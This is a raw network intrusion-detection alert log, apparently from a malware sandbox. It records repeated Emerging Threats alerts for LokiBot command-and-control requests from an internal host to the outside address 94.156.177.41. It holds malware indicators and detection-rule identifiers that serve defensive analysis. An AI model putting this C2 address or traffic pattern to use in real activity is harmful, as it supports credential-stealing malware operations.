2024-11-20T10:13:05.559942+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49263	TCP
2024-11-20T10:13:06.568943+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49264	TCP
2024-11-20T10:13:07.572722+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49265	TCP
2024-11-20T10:13:08.454411+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49266	TCP
2024-11-20T10:13:09.336370+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49267	TCP
2024-11-20T10:13:10.224675+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49268	TCP
2024-11-20T10:13:11.239377+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49269	TCP
2024-11-20T10:13:12.133372+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49270	TCP
2024-11-20T10:13:13.154951+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49271	TCP
2024-11-20T10:13:14.053593+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49272	TCP
2024-11-20T10:13:14.931750+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49273	TCP
2024-11-20T10:13:15.934392+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49274	TCP
2024-11-20T10:13:16.839438+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49275	TCP
2024-11-20T10:13:17.908765+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49276	TCP
2024-11-20T10:13:18.840854+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49277	TCP
2024-11-20T10:13:19.886547+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49278	TCP
2024-11-20T10:13:20.791119+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49279	TCP
2024-11-20T10:13:21.870501+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49280	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:36.639270+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:37.678741+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:38.716249+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:40.657533+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:41.542743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:42.435169+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:43.357085+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:44.250418+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:45.152866+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:46.807743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:47.853851+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:48.762372+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:49.780927+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:50.661713+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:51.563928+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:52.677319+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:53.596271+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:54.506581+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:55.397349+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:56.305736+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:57.196530+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:58.102470+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.990871+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:59.906870+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:12:00.919609+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:01.961464+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:03.002110+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:04.030990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:05.064968+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.957357+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:06.846240+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:07.734502+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:08.610456+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:09.486250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:10.489003+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:11.403681+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:12.422371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:13.483743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:14.380737+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:15.543328+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:16.542989+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:17.576303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:18.599605+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:20.249895+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:21.119620+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:22.167325+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:23.270065+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:24.148409+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:25.196987+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:26.119853+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:27.018600+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.971248+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:28.855102+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:29.827691+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:30.830951+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:31.861416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:32.777327+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:33.728123+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:34.632717+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:35.505221+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:36.376039+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:37.246761+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:38.148405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:39.034887+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:40.082470+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.998967+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.926270+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:42.940058+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:43.960547+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:45.163042+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:46.061782+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.952281+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:48.035363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.943612+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:50.033391+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.995621+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.871431+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:52.935942+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:54.054313+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:55.068247+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.953617+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:56.843900+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:57.763167+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:58.781339+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:59.717917+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:13:00.715397+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:01.604317+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:02.699741+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:03.729524+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:04.648130+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:05.554936+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:06.564082+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:07.564936+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:08.449519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:09.331162+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:10.215842+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:11.234165+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:12.128276+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:13.149900+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:14.047995+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.921761+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:15.927413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:16.829314+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:17.903807+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:18.831570+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:19.881369+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:20.786261+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:21.865363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49280	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:36.639270+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:37.678741+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:38.716249+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:40.657533+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:41.542743+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:42.435169+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:43.357085+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:44.250418+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:45.152866+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:46.807743+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:47.853851+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:48.762372+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:49.780927+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:50.661713+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:51.563928+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:52.677319+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:53.596271+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:54.506581+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:55.397349+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:56.305736+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:57.196530+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:58.102470+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.990871+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:59.906870+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:12:00.919609+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:01.961464+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:03.002110+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:04.030990+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:05.064968+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.957357+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:06.846240+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:07.734502+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:08.610456+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:09.486250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:10.489003+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:11.403681+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:12.422371+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:13.483743+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:14.380737+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:15.543328+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:16.542989+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:17.576303+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:18.599605+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:20.249895+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:21.119620+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:22.167325+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:23.270065+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:24.148409+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:25.196987+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:26.119853+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:27.018600+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.971248+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:28.855102+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:29.827691+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:30.830951+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:31.861416+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:32.777327+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:33.728123+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:34.632717+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:35.505221+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:36.376039+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:37.246761+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:38.148405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:39.034887+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:40.082470+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.998967+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.926270+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:42.940058+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:43.960547+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:45.163042+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:46.061782+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.952281+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:48.035363+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.943612+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:50.033391+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.995621+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.871431+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:52.935942+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:54.054313+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:55.068247+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.953617+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:56.843900+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:57.763167+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:58.781339+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:59.717917+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:13:00.715397+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:01.604317+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:02.699741+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:03.729524+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:04.648130+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:05.554936+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:06.564082+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:07.564936+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:08.449519+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:09.331162+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:10.215842+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:11.234165+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:12.128276+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:13.149900+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:14.047995+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.921761+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:15.927413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:16.829314+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49275	94.156.177.41	80	TCP
